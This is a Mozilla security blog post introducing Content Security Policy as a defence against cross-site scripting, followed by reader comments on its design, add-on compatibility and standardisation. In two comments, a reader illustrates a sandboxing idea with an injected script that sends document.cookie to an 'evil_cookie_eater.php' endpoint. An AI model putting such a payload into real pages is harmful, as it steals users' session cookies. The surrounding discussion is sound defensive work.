Shutting Down XSS with Content Security Policy

Brandon Sterne

28

For several years, Cross-Site Scripting (XSS) attacks have plagued many of the web’s most popular sites and victimized their users. At Mozilla, we’ve been working for the last year on a new technology called Content Security Policy, designed to shut these attacks down. We wanted to give a bit of background on this project as well as provide an update on our progress so far.

XSS is possible because all the content received as part of a web server response is treated with equal privilege by the requesting browser. JavaScript and other content included in a web page are all combined into a single security context which has full access to the DOM. Content Security Policy (CSP) provides a mechanism for sites to explicitly tell the browser which content is legitimate. The browser can then disregard any content which has not been blessed by the site.

In order to differentiate legitimate content from injected or modified content, CSP requires that all JavaScript for a page be 1) loaded from an external file, and 2) served from an explicitly approved host. This means that all inline script, javascript: URIs, and event-handling HTML attributes will be ignored. Only script included via a <script> tag pointing to a white-listed host will be treated as valid. Additionally, CSP allows several other common-sense security restrictions to be enforced.

We realize that this model is dramatically different than the current unrestricted model for the Web. We offer the following case supporting CSP’s adoption:

  1. CSP can be implemented in phases.

    While the biggest security benefit offered by Content Security Policy is the mitigation of XSS through inline script blocking, the migration of all JavaScript to external files may be challenging or time-consuming for some sites. Therefore, sites may choose to use the other features of Content Security Policy without adopting the JavaScript restrictions. Our hope is that this flexibility will provide a wide gate for such sites to adopt CSP in a limited fashion early, and later move toward a full implementation as time and resources permit.

  2. Even complex sites can be modified to support CSP.

    We have looked at HTML/JavaScript samples from a wide variety of websites ranging in complexity and have yet to see an example which could not be modified to support CSP. We’ll provide documentation regarding best practices for migrating a site to use CSP. Content Security Policy is also consistent with the programming paradigm “don’t mix code with content” so there may be additional functional benefits to be gained by implementing such separation.

  3. Drive a stake through the heart of XSS!

    XSS vulnerabilities have real value to attackers and are shared rapidly across the Web once discovered. Sites can breathe a little easier knowing that their users are protected, even if a XSS bug slips through. Because CSP can be configured to notify the protected site when an attack is blocked, CSP will even benefit users of older browsers, by helping sites identify and plug vulnerabilities quickly. The bottom line is that it will be extremely difficult to mount a successful XSS attack against a site with CSP enabled. All common vectors for script injection will no longer work and the bar for a successful attack is placed much, much higher.

Content Security Policy has been a collaboration of many individuals and has received input from multiple web sites, browser vendors, and web app security researchers. We are very excited to have reached a level of stability in the design that has allowed us to begin implementation of the CSP specification. Stay tuned for further updates. We will let you know when the fixes have been checked in to trunk and the product is ready to be tested in our nightly builds. Let us know what you think!

Brandon Sterne
Security Program Manager

28 responses

  1. Alan wrote on ::

    What’s with the text/x-content-security-policy MIME type and X-Content-Security-Policy HTTP header in the spec? Surely if this is a proposed standard then both of these should be standardised and not marked as proprietary? Otherwise it seems a very good proposal to mitigate XSS attacks.

  2. voracity wrote on ::

    I appreciate your efforts to bolster security on the web, but this is an over-reaction. Has anyone conducted any decent risk analysis of XSS attacks? Involving hard estimates of probabilities and utilities (or at least economic costs)? Has anyone compared these costs to breaches of security via other means? (i.e. viruses, malware, browser holes, server exploits, psychological tricks) Would the costs be within even an order of magnitude? Would the costs be within even several orders of magnitude?

    Please answer these questions before you consider radically changing the culture of the web.

    As far as I can tell, all public website XSS problems can be solved very simply by fixing 3rd party cookie security rights (a la web fonts, XHR, etc.) and using sandboxes. The fact that cross-site cookies today aren’t treated with the same gravity as cross-site XHR et al. (by all browser makers) is an absolute scandal.

    This proposal is an inappropriate response to the problem: it is 10 years in jail for littering. Please — *please* — consider what you are doing very carefully before proceeding.

  3. Daniel Veditz wrote on :

    In my own browsing I’ve turned off 3rd party cookies (really off, not Safari and IE’s half-off — “send ‘em if you’ve got ‘em” sounds suspiciously like the fatalistic “smoke ‘em if you’ve got ‘em”). It was no protection from any of the XSS attacks disclosed on http://xxsed.com or in nearly three years of the “So it begins…” thread at http://sla.ckers.org/forum/read.php?3,44

  4. Brandon Sterne wrote on ::

    @voracity:

    I’m not sure I understand your “over-reaction” argument. Content Security Policy is an opt-in mechanism. The severity of the XSS problem in the wild, and the cost of implementing CSP as a mitigation are open to interpretation by individual sites. If the cost vs. benefit doesn’t make sense for some site, they’re free to keep doing business as usual.

  5. voracity wrote on ::

    @Brandon: I appreciate CSP is an opt-in security technique (mandatory would be lunacy) but unless I’m much mistaken, you intend it to eventually be used by all major sites. Otherwise, why go to such efforts? If all major sites use it, it will have to be taught in colleges and universities as preferred web-programming practice. Hence why it will change the current culture.

    “The severity of the XSS problem in the wild … [is] open to interpretation by individual sites.”

    Ah, well, I don’t agree; the severity of the XSS problem is objective. It may not be easy to measure the severity (in terms of economic cost or, more accurately, social harm), but it is nonetheless objective. Are there any studies of the long-term economic costs of XSS attacks as compared to viruses or, say, bad web design?

  6. voracity wrote on ::

    @Daniel: “[Disabled 3rd party cookies] was no protection from any of the XSS attacks.”

    Really? I hope you’ll understand if I have my doubts.

    You’d at least agree that if someone is logged into their favourite pet store website, an evil 3rd party website can execute privileged actions on the pet store site unless the pet store site has taken appropriate security measures on the server. This wouldn’t be a problem if 3rd party cookie rights were handled properly (that is, as per cross-site XHR and fonts).

    I think we need to be clear about which XSS security issues we are dealing with:

    – HTML injection via GET or POST parameters: These can’t automatically be blocked because you can’t automatically tell the valid from invalid uses of HTML in submitted parameters. Yes, HTML in a GET parameter is unusual today, but it might not always be that way. JSON in a GET parameter was unusual once, too. And page injections here aren’t the real concern (sandboxes can do the protection) — the big worry is injection on the server (e.g. SQL injection, command line injection, out of bounds values, etc.)

    – User submissions and user pages (ebay, facebook, webmail, etc.): Random-boundary sandboxes. Enough said. Also, the style tag should only apply locally within its parent node! (It’s preposterous that style tags are hoisted to document level.) Imagine how simple life would be for the GMail developers if they could simply wrap each email in a conversation in its own sandbox?

    – Identity theft: As I described before, this can be solved by doing 3rd party cookie security properly. Intranets are different, but that’s just because privileges are identified differently (but don’t worry, the problem can still be solved). Identity can also be stolen when cookie authentication is used in conjunction with user submissions — but in those cases, what fixes the problem? Sandboxes.

    Again, the moral of the story is all XSS attacks can be vitiated by proper 3rd party cookie security and sandboxes (very important). In fact, CSP is just a very extreme and very inflexible form of sandbox!

  7. Chase Seibert wrote on ::

    I can’t tell if this is a domain, page or DOM node based system. Really, we should have all three. For websites that do have a lot of their own javascript, but output dynamic data into HTML templates, the page based whitelist is critical.

  8. Daniel Veditz wrote on :

    @Chase: The policy is specified per page, although you could approximate per domain using the policyURI option and having all your pages load the same policy. The whitelisting in the policy is domain-based, or I should say origin-based since you also specify the scheme and port of the site from which you’re allowed to load.

    Could you elaborate on what you meant by a “DOM node based system”?

  9. dan w wrote on :

    Thanks for the post on CSP.

    While good web application design does favor separating javascript into
    separate files for both code manageability and efficiency (caching,compression),
    I wonder how much work most websites would require to completely rid most
    webapps of all inline code. Have you done any measurements on this for
    common applications? Regardless, I think there is value in this approach,
    because as you point out, it let’s a site that really cares about CSS put in
    some extra effort to gain better resistance.

    I do not have a deep understanding of the XSS theat model or all solutions that have been proposed, so I am hoping you can answer a question that I have. It seems
    that proposals like CSP try to enforce the principal that ‘only whitelisted
    code can be run on the client’. Since whitelisting code that is inlined
    is markup seems hard, such code is prohibited. It would seems more flexible
    if the site’s policy could simply what code on that page cannot do. For
    example, prevent any javascript on the page from communicating data in any
    form (e.g., cookies) to anything but the originating site. In a sense, this
    would be saying “It’s ok if the attacker can inject code on a page, as long
    as that code cannot do anything truly dangerous” (like steal personal data
    from the page). Of course, this approach has problems in scenarios if a
    browser vulnerability allows javascript (or a malformed image) to break out of
    the sandbox, but that seems like a whole different attack.

    It seems that this approach makes a different trade-off than CSP, favoring
    flexibility for the web developer at the cost of some (but how much) lost
    security. Then again, I may be missing something entirely, as I am no expert
    on XSS. Thanks

  10. frenchfries wrote on :

    From what is understand, this system would be based on a set of rules defined in HTTP headers or meta tags in the web page…
    What about using a single txt file at the root of the server (like the robots.txt file or the cross-domain method used by Flash) ?
    It’s easier to implement, it takes less bandwitdh (won’t be sent at each response from the server) and it’s probably more safe (possibility of headers injection wit CRLF poisoning)

  11. voracity wrote on ::

    @dan w: Sandboxing is conceptually simple. For example, the generated page might contain:

    Innocent text
    new XMLHttpRequest().open(“evil_cookie_eater.php?”+document.cookie)
    More innocent text

    During parsing, the browser would identify the sandbox-boundary sections and strip out — during the parse, not DOM construction — anything dangerous that appears inside, leaving this (for example):

    Innocent text
    More innocent text

    I’m actually pretty confident browser makers will do this eventually (there are too many applications that are cumbersome without it). It’s just a question of whether it’s 1 year, 5 years or 10 years. :)

  12. voracity wrote on ::

    [Angle brackets got chewed. Is that irony?] Here it is again, with angle brackets replaced with square brackets.

    Before:

    [div sandbox-boundary="CDOIJO809DDMo33mdlkDxjk"]
    Innocent text
    [script]new XMLHttpRequest().open(“evil_cookie_eater.php?”+document.cookie)[/script]
    More innocent text
    [/div sandbox-boundary="CDOIJO809DDMo33mdlkDxjk"]

    After:

    [div sandboxed]
    Innocent text
    More innocent text
    [/div]

  13. PaPPy wrote on ::

    I know some sites that have shut down due to an XSS worm. It took a lot of time to clean up, and the admin called it quits. Also XSS could lead to sites that store credit cards, amazon, to feed the on going identity theft plague.

    Or you could fake a news article, http://www.wired.com/culture/lifestyle/news/2003/02/57506
    And see if you could get real news coverage :D

  14. Andre wrote on :

    Has this solution been submitted to the W3C or had an RFC submitted?

  15. Tim Powell wrote on ::

    How does this policy affect classic bookmarklets (using javascript: URIs) and Greasemonkey scripts? It is unacceptable to lose the ability to customize pages and their interaction. There’s a fundamental difference between JavaScript embedded in or linked to by pages and JavaScript run by bookmarklets and user scripts, but unfortunately they are often treated the same in the security model.

  16. Daniel Veditz wrote on :

    Greasemonkey scripts are definitely unaffected. I’m not sure about bookmarklets; if we’ve broken them we’ll try to get them working again.

    The goal of CSP is to protect users by cooperating with site authors to enforce their security policies. This in no way means we’ve forgotten that the browser is the _user’s_ agent. It’s right there in the Mozilla Manifesto: “5. Individuals must have the ability to shape their own experiences on the Internet.”

  17. John Bell wrote on :

    I’m very glad to hear that bookmarklets will be repaired if they are broken by CSP. That was my first concern when I heard that this policy was being developed some time ago. I have to say that I am still worried, though, that advanced bookmarklets will be restricted because they act in much the same was as some XSS attacks. For instance, a bookmarklet that bootstraps in a complex javascript app via script tags, which then continues to send data back via other script tag includes. The sandbox that allows bookmarklets also needs to recognize that any actions initiated by that bookmarklet later on also need to be included in the sandbox.

  18. William wrote on :

    Will this stuff be enforced against javascript run via NPN_Evaluate() from an NPAPI plugin?

  19. Daniel Veditz wrote on :

    @John Bell: Some advanced bookmarklets may not work. If the bookmarklet does something that will load data from another site that action will be subject to the CSP whitelist. Anything the bookmarklet adds to the page is part of the page and subject to the limitations on the page.

    It will be possible for users to disable Content Security Policy protection if for some reason they need to do so. The user can weigh the need to run their own script injection against the risk of unauthorized script injection.

    @William: We still have a few blurry edges around plugins. Some plugins can make their own network connections that are completely out of the browsers control. If there’s enough interest in CSP some of the plugin vendors may be interested in extending the NPAPI so they can participate in that model. Some people want to be able to control which types of plugin can load, not just from which sites. So far we’ve resisted that complication but it’s useful feedback. NPN_GetURL() and the like we’re currently planning to vet against the plugin-src whitelist.

    Currently NPN_Evaluate is allowed because you allowed the plugin to load, but we can argue that the plugin’s origin should be vetted against the script-src whitelist before being allowed to call NPN_Evaluate(). It’s an open question.

  20. John Bell wrote on :

    @Daniel Veditz: I’m disappointed to hear that. Is it at least possible for the user to have a global whitelist that overrides the one defined by the page/headers? A granular way to disable CSP that would allow it to still function in general, but trust all script includes that load from specific domains? I certainly see the value in CSP in general and wouldn’t want to recommend that people disable it completely, but a user whitelist (covered in enough warnings) seems like it would be a reasonable way to add CSP without limiting functionality.

  21. Daniel Veditz wrote on :

    @John Bell: It’s good feedback, we’ll have to think about it. It’s certainly “possible” — it’s just code after all.

    I have mixed feelings. I’d really like to get people excited about CSP, site authors and other browser vendors in particular. A user-agent override doesn’t belong in the specification that is a contract between the site and the browser, and while supporting overrides is a valid implementation decision talking about it is a bit of a distraction and may even undercut the message to site authors. It would also, of course, require more work on our part so I’m not unbiased :-)

    On reflection, though, overrides might be a required workaround to avoid breaking add-ons that create mash-ups or add elements to content. Argh.

  22. bugmenot wrote on :

    When this CSP implementation is expected to be available?

  23. Arun Ranganathan wrote on ::

    @Andre: an early version of this solution was submitted to the W3C Web Apps WG. See for example this thread of correspondence:
    http://lists.w3.org/Archives/Public/public-webapps/2008AprJun/0416.html

    The charter of that WG was never modified to include CSP. We’re keen on working with a standards setting body, and are still in the process of determining where the proposal works best.

  24. John Bell wrote on :

    @Daniel Veditz: I certainly understand why you want to keep a narrow focus right now. If it was me, I’d actually think about building it into the spec since it’s something that modifies the ruleset applied to the final page. But obviously it’s your spec, you can handle it however you want. I just suspect that one of the questions you’ll get from anybody you’re trying to get excited about CSP is if it breaks any existing functionality, and (as one of the site authors in question) I know that “yes” isn’t as good an answer to that question as “yes, but we have a way around it”.

    But in any case, I’m glad you’re at least open to the possibility. Thanks for listening.

  25. voracity wrote on ::

    Could someone perhaps explain what is wrong with sub-page sandboxing?

    In particular, what does page-level sandboxing solve that sub-page level sandboxing cannot?

  26. AckNack wrote on :

    “On reflection, though, overrides might be a required workaround to avoid breaking add-ons that create mash-ups or add elements to content. Argh.”

    Yes. Greasemonkey would be sure to fail too, unless its given privs to inject javascript and content into web pages as it does now.

    As part of these changes, pleeeeease preserve the ability to allow add-ons to continue to function correctly by allowing event/content/javascript injection as they can now do. For example, the DejaClick addon has a feature to annotate web recording. It does this by injecting user-recorded popup notes (html or SVG) into web pages as it replaying (via HTML and CSS content injection). Also, there will soon be a feature in DejaClick to allow users to inject snippets of Javascript code before or after a replayed event for special circumstances.

    Add-ons developers already went thru a similar fiasco by having to add “contentaccessible=yes” to the content directives of all their chrome.manifest files, so I certainly hope we don’t make the same mistakes with this stuff.

  27. Daniel Veditz wrote on :

    “CSP, brought to you by the same guys who gave you contentaccessible=yes” — I sense our popularity with add-on developers rising by the day.

  28. austin cheney wrote on ::

    From a technology perspective this is an elegant solution for two reasons.

    1) It will mostly cure XSS. I have been telling people for months that mitigation is not a solution.

    2) It forces JavaScript off the damn page. This is something HTML should have fixed years ago. In page JavaScript has been a horrible culprit in namespace collisions that can occur from third-party ads that crash your own native code.

    I have noticed four problems that may cause this proposition to fail:

    1) Advertising business interference
    Unfortunately this solution is horribly flawed from a business perspective. Business on the web is extremely reliant upon advertisements whose metrics are tracked by execution of client-side script supplied by those ads. It seems this solution will also eliminate this revenue stream. I expect this to meet some serious criticism.

    2) Not a standard
    I see no indication that this venture is representative of any sort of standard. Security is a universal problem that demands a universal solution. A Firefox favoring proprietary solution will certainly benefit Firefox as a product and reposition it in the grab for market share, but it will not fix the problem. I strongly recommend that this action be written as an internet draft and submitted to the IETF as an extension of URI/HTTP.

    3) No client-side control mechanism
    The root of the problem is that malicious software written by a stranger is executing at will at the user-agent. This solution provides a mechanism for the site to inform the browser of the approved script repository where that script only is then executed in accordance with the status quo. That mechanism will likely occur as an HTTP header to provide transparency to the user. Unfortunately this still does not provide any control to the user of which code should or should not execute. If malicious code is living in the blessed repository then nothing is gained and attacks continue without the user’s knowledge. A user must be able to make decisions about what is executing on their own software on their own machine or the problem is merely diminished instead of solved.

    4) Relay points
    There is no indication that scripts cannot point to a reference outside the blessed sandbox, which opens possibilities of attack from a couple different angles. If script uses the XMLHttpRequest object to point to a location outside the blessed sandbox for additional instructions then nothing is gained by this mechanism. The mere opening of such a connection could be a point of exploitation if the code or data being retrieved is entirely benign. Again, there must be notifications provided to the user before code executes locally without prior discriminatory user consent.

    You guys have my full support on this endeavor as drastic steps must be taken to solve this problem. There are more XSS vulnerabilities reported than all other computer security vulnerabilities combined and doubled. If this problem is not solved by any means necessary commerce on the web will fail, and the web itself will fail.

    Before becoming aware of this work I posted a solution of migrating script execution to email using a secure mechanism. The proposal is completely sound from both a technology and security perspective, but is so far extremely unpopular for eliminating execution of events. Since this alternate solution is based off a more complex transmission mechanism it may or may not be helpful. I hope that may be able to provide any additional guidance that may not have been previously considered.
    http://www.ietf.org/id/draft-cheney-safe-04.txt